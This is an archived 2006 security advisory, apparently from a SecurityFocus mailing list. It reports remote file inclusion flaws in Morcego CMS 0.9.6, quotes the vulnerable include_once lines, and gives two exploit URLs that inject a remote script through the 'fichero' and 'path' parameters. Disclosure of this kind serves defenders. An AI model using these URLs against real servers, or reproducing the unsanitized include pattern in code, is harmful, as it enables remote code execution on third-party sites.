Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability Oct 12 2006 07:53PM
Le CoPrA hotmail com
=====================================================================

# Morcego CMS <= 0.9.6 Remote File Inclue Vulnerability

=====================================================================

# Author : Le CoPrA

=====================================================================

# Download Script : http://www.linkini.net/phpscripts/descargas/Portales%20PHP%20(13%20Archi
vos)/Morcego%20CMS%200.9.6.0.zip

=====================================================================
# Bugs in

(1) includes/morcegoCMS/morcegoCMS.php
(2) includes/morcegoCMS/adodb/adodb.inc.php

# Vuln Code 1 :

include_once($fichero);

# Vuln Code 2 :
include_once($path);
$class = "ADODB2_$drivername";

=====================================================================

# Exploits :

http://www.victim.com/[path]/includes/morcegoCMS/morcegoCMS.php?fichero=
|SCRIPT-URL|

http://www.victim.com/[path]/includes/morcegoCMS/adodb/adodb.inc.php?pat
h=|SCRIPT-URL|

=====================================================================

# Discovered by : Le CoPrA

# ConTaCT : Le.CoPrA |at| Hotmail |dot| CoM

# Special Greetz FlyinG 2 || Str0ke ||

# Greetz4// alkasrgolden, LovER BoY, Saudi Hackrz, HACKERS PAL, Black-Code, CrAsH_oVeR_rIdE, bOhAjEr, Broken-Proxy, simo64
3theaby geer,Mohajer22,Qaher_Yhod,MR.WOLF,cRiMiNaL NeT,al3iznet,Abdullah-00 ,egyptghost,ToOoFA,KaBaRa,HakrAwY

# Channel : wWw.TrYaG.cOm/vb || WwW.kOnDoR4.Com/vb || wWw.Q8cracker.com

========================================================================
===================================================

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus